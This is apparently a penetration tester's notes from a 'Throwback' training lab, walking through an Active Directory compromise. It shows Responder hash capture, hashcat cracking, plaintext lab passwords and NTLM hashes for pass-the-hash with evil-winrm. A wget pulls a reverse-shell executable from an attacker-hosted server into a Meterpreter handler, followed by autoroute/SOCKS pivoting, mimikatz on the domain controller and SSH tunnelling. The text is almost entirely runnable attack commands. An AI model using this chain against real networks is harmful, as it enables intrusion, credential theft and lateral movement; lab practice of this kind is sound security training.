Skip to content

Throwback-Prod

22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Caught an NTLM hash for the user PetersJ using responder

cracked with hashcat

hashcat -m 5600 peters-hash /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule --debug-mode=1 -
-debug-file=matched.rule

Password is Throwback317

able to log in now with

ssh PetersJ@throwback.local@10.200.70.219

Saved credentials

BlaireJ

7eQgx6YzxgG3vC45t5k9

Elevation

runas /savecred /user:admin-petersj /profile "cmd.exe"

then set up meterpreter session as peterj-admin

autorouting

and socks proxy (4a)

Now log into Throwback-WS01 as BlaireJ

proxychains ssh BlaireJ@Throwback.local@10.200.70.222

Then enter the password

7eQgx6YzxgG3vC45t5k9

Setting up the proxy

evil-winrm -u admin-petersj -H 74fb0a2ee8a066b1e372475dcbc121c5 -i 10.200.70.219

establish meterpreter

python3 -m http.server 444

wget http://10.50.71.63:444/rshell-4444.exe -o shell.exe

msfconsole -q -x "use multi/handler"

set payload windows/x64/meterpreter/reverse_tcp

set lhost tun0

set lport 4444

run

./shell.exe

run autoroute -s 10.200.70.0/24

bg

use auxiliary/server/socks_proxy

run

Setting up the next hop

proxychains evil-winrm -u MercerH -H 5edc955e8167199d1b7d0e656da0ceea -i 10.200.70.117

wget http://10.50.71.63:444/rshell-4445.exe -o shell.exe

msfconsole -q -x "use multi/handler"

set payload windows/x64/meterpreter/reverse_tcp

set lhost tun0

set lport 4445

run

./shell.exe

bg

use post/multi/manage/autoroute

set session 1

run

use auxiliary/server/socks_proxy

run

Current objective: run mimikatz on Throwback-DC01 to get MercerH password - Changed it to Throwback2020

Pivoting with SSH tunnel

(example attacker - kali pwned jumpbox - debian )

To setup a socks proxy from our kali machine on port 8080

sudo ssh -N -D localhost:8080 <user>@debian

Run stuff through the proxy proxychains.conf

socks4 localhost 8080

proxychains <command>